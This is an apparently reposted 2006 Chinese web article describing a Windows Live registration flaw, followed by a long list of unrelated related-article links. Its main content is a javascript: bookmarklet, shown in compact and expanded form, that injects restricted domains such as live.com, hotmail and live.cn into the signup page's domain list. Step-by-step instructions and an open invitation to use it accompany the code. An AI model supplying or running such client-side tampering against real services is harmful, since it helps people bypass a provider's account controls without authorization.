Windows Live的@live.com域名注册漏洞 利用代码


Posted in Javascript onDecember 27, 2006

又一个Windows Live的@live.com域名注册漏洞被发现,现在我们只要通过简单的一段JS代码就可以给Windows Live的注册界面添加@live.com地址,让人惊讶的是,硬塞进去的地址竟然可以成功注册到帐号!又是一次极好的机会,大家快来一起上吧!

Update:更新代码,提供更多域名,包括live.cn
方法简单:

1、进入这个页面:http://get.live.com/getlive/overview
2、点击”立即注册“按钮
3、在地址栏粘贴以下文件中的代码,并回车:

javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="live.");r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d+"com",d+"be",d+"co.uk",d+"de",d+"fr",d+"it",d+"nl",d+"cn")); for (i=0;i<a.length;i++){ s(i ) }alert("Success - additional domains added!"); 

分析后:

javascript: 
function r(q){} 
function s(q){e[q] = new Option(a[q],a[q])}; 
r(e = document.getElementById("idomain").options); 
r(d="live."); 
r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d+"com",d+"be",d+"co.uk",d+"de",d+"fr",d+"it",d+"nl",d+"cn")); 
for (i=0;i<a.length;i++){ 
 s(i ) 
 } 
alert("Success - additional domains added!");
Javascript 相关文章推荐
JS 拼图游戏 面向对象,注释完整。
Jun 18 Javascript
JS远程获取网页源代码实例
Sep 05 Javascript
javascript完美拖拽的实现方法
Sep 29 Javascript
基于javascript实现根据身份证号码识别性别和年龄
Jan 22 Javascript
BootStrap中按钮点击后被禁用按钮的最佳实现方法
Sep 23 Javascript
jquery操作ul的一些操作笔记整理(干货)
Aug 31 jQuery
angular2系列之路由转场动画的示例代码
Nov 09 Javascript
vue中实现左右联动的效果
Jun 22 Javascript
解决element UI 自定义传参的问题
Aug 22 Javascript
Layui表格行工具事件与数据回填方法
Sep 13 Javascript
Vue时间轴 vue-light-timeline的用法说明
Oct 29 Javascript
Ant Design Pro 之 ProTable使用操作
Oct 31 Javascript
用javascript实现无刷新更新数据的详细步骤 asp
Dec 26 #Javascript
提高 DHTML 页面性能
Dec 25 #Javascript
js中几种去掉字串左右空格的方法
Dec 25 #Javascript
js静态作用域的功能。
Dec 25 #Javascript
js不是基础的基础
Dec 24 #Javascript
静态的动态续篇之来点XML
Dec 23 #Javascript
脚本吧 - 幻宇工作室用到js,超强推荐expand.js
Dec 23 #Javascript
You might like
什么是短波收听SWL
2021/03/01 无线电
php数组函数序列之array_unique() - 去除数组中重复的元素值
2011/10/29 PHP
yii添删改查实例
2015/11/16 PHP
php array_multisort 对数组进行排序详解及实例代码
2016/10/27 PHP
php实现每日签到功能
2018/11/29 PHP
脚本吧 - 幻宇工作室用到js,超强推荐share.js
2006/12/23 Javascript
使用js获取QueryString的方法小结
2010/02/28 Javascript
js getElementsByTagName的简写方式
2010/06/27 Javascript
jquery 漂亮的删除确认和提交无刷新删除示例
2013/11/13 Javascript
js图片卷帘门导航菜单特效代码分享
2015/09/10 Javascript
浅析AngularJs HTTP响应拦截器
2015/12/28 Javascript
js 动态给元素添加、移除事件的实现方法
2016/07/19 Javascript
关于AngularJs数据的本地存储详解
2017/01/20 Javascript
使用jQuery操作DOM的方法小结
2017/02/27 Javascript
jquery实现图片放大点击切换
2017/06/06 jQuery
bootstrap是什么_动力节点Java学院整理
2017/07/14 Javascript
小程序实现页面顶部选项卡效果
2018/11/06 Javascript
vue与django集成打包的实现方法
2019/11/11 Javascript
python编程-将Python程序转化为可执行程序[整理]
2007/04/09 Python
Python命名空间详解
2014/08/18 Python
python搭建微信公众平台
2016/02/09 Python
python+matplotlib实现动态绘制图片实例代码(交互式绘图)
2018/01/20 Python
python中多个装饰器的执行顺序详解
2018/10/08 Python
python无序链表删除重复项的方法
2020/01/17 Python
Python3连接Mysql8.0遇到的问题及处理步骤
2020/02/17 Python
django ListView的使用 ListView中获取url中的参数值方式
2020/03/27 Python
Python3爬虫带上cookie的实例代码
2020/07/28 Python
HTML5之SVG 2D入门1—SVG(可缩放矢量图形)概述
2013/01/30 HTML / CSS
Trunki英国官网:儿童坐骑式行李箱
2017/05/30 全球购物
波兰珠宝品牌:YES
2019/08/09 全球购物
一道SQL存储过程面试题
2016/10/07 面试题
咖啡书吧创业计划书
2014/01/13 职场文书
企业演讲稿范文大全
2014/05/20 职场文书
电子商务专业求职信
2014/07/10 职场文书
出纳试用期工作总结2015
2015/05/28 职场文书
游戏开发中如何使用CocosCreator进行音效处理
2021/04/14 Javascript